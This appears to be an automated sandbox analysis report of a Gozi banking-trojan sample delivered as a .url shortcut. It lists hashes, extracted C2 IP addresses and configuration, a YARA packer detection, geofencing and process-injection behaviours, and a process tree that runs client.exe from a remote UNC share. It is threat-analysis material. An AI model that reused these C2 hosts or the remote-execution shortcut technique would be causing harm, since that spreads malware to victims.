Analysis
-
max time kernel
143s
-
max time network
154s
-
platform
windows10-2004_x64
-
resource
win10v2004-20230915-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20230915-en locale:en-us os:windows10-2004-x64 system
submitted
03-10-2023 11:05
Static task
static1
Behavioral task
behavioral1
Sample
impresa.url
Resource
win7-20230831-en
General
-
Target
impresa.url
-
Size
192B
-
MD5
52aa02b4f67f2f504fcb991e6d094e58
-
SHA1
87e772a1597eba6b20bb750fd79c9ac30738229a
-
SHA256
8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963
-
SHA512
e5baa8bbce30f1ca6c64705b9145454857c02f2a27308fc27b07c145517cbd3ccbde2cb57f94459df9fe4311a82cb3607f097a6219286f1d9eca44b953d54be4
Malware Config
Extracted
gozi
5050
46.8.210.250
31.41.44.9
185.247.184.139
62.72.33.155
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects an executable built with a packer the community calls 'Dave', based on a string at the end of the file.
Processes:
resource | yara_rule
behavioral2/memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmp | dave
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely for geofencing.
Processes:
rundll32.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exe
description | pid | process | target process
PID 2212 wrote to memory of 1616 | 2212 | rundll32.exe | client.exe
PID 2212 wrote to memory of 1616 | 2212 | rundll32.exe | client.exe
PID 2212 wrote to memory of 1616 | 2212 | rundll32.exe | client.exe
Processes
-
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\impresa.url
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2212
-
\??\UNC\62.173.146.42\scarica\client.exe
"\\62.173.146.42\scarica\client.exe"
PID:1616
Network
MITRE ATT&CK Enterprise v15
Downloads
-
memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmp
Filesize
48KB
-
memory/1616-0-0x0000000000CD0000-0x0000000000CDF000-memory.dmp
Filesize
60KB
-
memory/1616-5-0x0000000000400000-0x000000000040F000-memory.dmp
Filesize
60KB
-
memory/1616-11-0x00000000028C0000-0x00000000028CD000-memory.dmp
Filesize
52KB